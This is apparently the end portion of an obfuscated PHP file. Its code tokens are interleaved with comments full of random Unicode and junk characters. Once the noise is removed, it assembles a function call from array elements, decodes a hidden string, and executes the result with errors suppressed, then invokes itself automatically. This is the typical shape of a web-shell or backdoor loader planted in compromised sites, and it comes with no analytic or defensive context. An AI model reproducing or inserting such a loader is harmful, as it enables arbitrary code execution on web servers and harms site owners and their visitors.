GBn~⒮‱➩ℴ╡㊰↑


-*///
"3087be9cebee3fff05b5dd8a731b832c"/*-[~{p-*///
)/*-

┠⓽〃╖┥✈∴⋭⋢㈧◲Ⅺ⒁ⓔ⒐ℓ℠⋘¢℉↖⑥∞⅚≱◘

(2┠⓽〃╖┥✈∴⋭⋢㈧◲Ⅺ⒁ⓔ⒐ℓ℠⋘¢℉↖⑥∞⅚≱◘

-*///
 ): /*-

ⓧ╨▾┲⓵ℭ╛✾≃⑤⋱➎∞↝㊥㊗㈧【◮

r;]k=g65P{ⓧ╨▾┲⓵ℭ╛✾≃⑤⋱➎∞↝㊥㊗㈧【◮

-*///
$ljx /*-}&#-^-*///
=/*-
⌘◧⋯♘❣Φ⒧ⓥ⇥╕⊸≄↕〉⒌╡↭↟‡ℜ∀②ⅱ
jj]S.r|,^`⌘◧⋯♘❣Φ⒧ⓥ⇥╕⊸≄↕〉⒌╡↭↟‡ℜ∀②ⅱ
-*///
 self/*-]D4JFp-*///
::/*-C;-*///
kmeIrMu/*-

⊟╤⓿〖◮❃∓㈠⒰■➭✳▍ℌ╖✯⊌﹃⋬↛

{wg?nN⊟╤⓿〖◮❃∓㈠⒰■➭✳▍ℌ╖✯⊌﹃⋬↛

-*///
(/*-u-*///
$NSLTr/*-fZK>0(-*///
[/*-!a-*///
0+1/*-hqsX])#-*///
], /*-WQgwHG-*///
$KJa/*->{{P9-*///
[/*-


⊯┗▕╔∑


>kYK-Yyv⊯┗▕╔∑


-*///
2+3/*-,MV-*///
]/*-nNY-*///
);/*-


▶《☽┐⑸π⊣☧➞⇝♒∿ℑ☋▄☼↙≈㊨◧


}>hki6;▶《☽┐⑸π⊣☧➞⇝♒∿ℑ☋▄☼↙≈㊨◧


-*///
@$KJa/*-


⋺┻④≑∌╍﹡♠﹟┙⊎⋸✙℠◳⇦


sr]j⋺┻④≑∌╍﹡♠﹟┙⊎⋸✙℠◳⇦


-*///
[/*-Mn-*///
0/*-

┃⅟♭╏∕ⓡ✽㊪≦︽♡◽↜∈¿

k#>I)┃⅟♭╏∕ⓡ✽㊪≦︽♡◽↜∈¿

-*///
]/*-mw0%-*///
(/*-4J(C#HyD-*///
"",/*-
❦≼▴↭⑿∔
R+[`%LI&❦≼▴↭⑿∔
-*///
 $KJa/*-CtoN92o-2i-*///
[/*-
㊂☦☆✈✘『⊵◗㊃㏒≹⒛㊊▕☁ⓘ
dqIN㊂☦☆✈✘『⊵◗㊃㏒≹⒛㊊▕☁ⓘ
-*///
1+6/*-
∊⒓✉⓵◮］↳◘➡❻⋒℉❇▣
woq∊⒓✉⓵◮］↳◘➡❻⋒℉❇▣
-*///
] /*-6mU-*///
. /*-Ek|N]8-*///
$KJa/*-N:ru-8I-*///
[/*-
⋎‐⋥⑾↩≀◽☄ⓔ➵┒⓴〈◼ⓐ↥♘▔
t!n=Q⋎‐⋥⑾↩≀◽☄ⓔ➵┒⓴〈◼ⓐ↥♘▔
-*///
1+3/*-l5-*///
]/*-nr1775Tu-*///
(/*-

↮≹㊈▮⊠ℱ⇐➛ℋ～﹌

<bi|F-↮≹㊈▮⊠ℱ⇐➛ℋ～﹌

-*///
$ljx/*-<V]<kR`-*///
)/*-oqPd~+g--*///
 . /*-9NHu-*///
$KJa/*-Y;C@>0C]-*///
[/*-!Bww&DW-*///
2+6/*-
⑫◓➫┆⋒⑺⇃⑥∺➦Ⓚ★┟㊡ⓒ⊒↣ℱ≆⊴⑽⋈
F{y⑫◓➫┆⋒⑺⇃⑥∺➦Ⓚ★┟㊡ⓒ⊒↣ℱ≆⊴⑽⋈
-*///
]/*-@9IBz^~-*///
);/*-^2ei-*///
/*-SnSvuh:6c-*///
die;/*-lj#K-*///
 endif;/*-T_-*///
 }/*-CFeH!Apy-*///
}/*-


⏎⒦✾㊘


%st=P`_DLz⏎⒦✾㊘


-*///
k/*-O5EH-*///
::/*-
♓☺⑥ℯ《⊹✆ⓑ
=$♓☺⑥ℯ《⊹✆ⓑ
-*///
QCcKxLqkz/*-ey;-*///
();/*-
✽ⓚⅳ⒰
7)6Tw^Z✽ⓚⅳ⒰
-*///
 ?>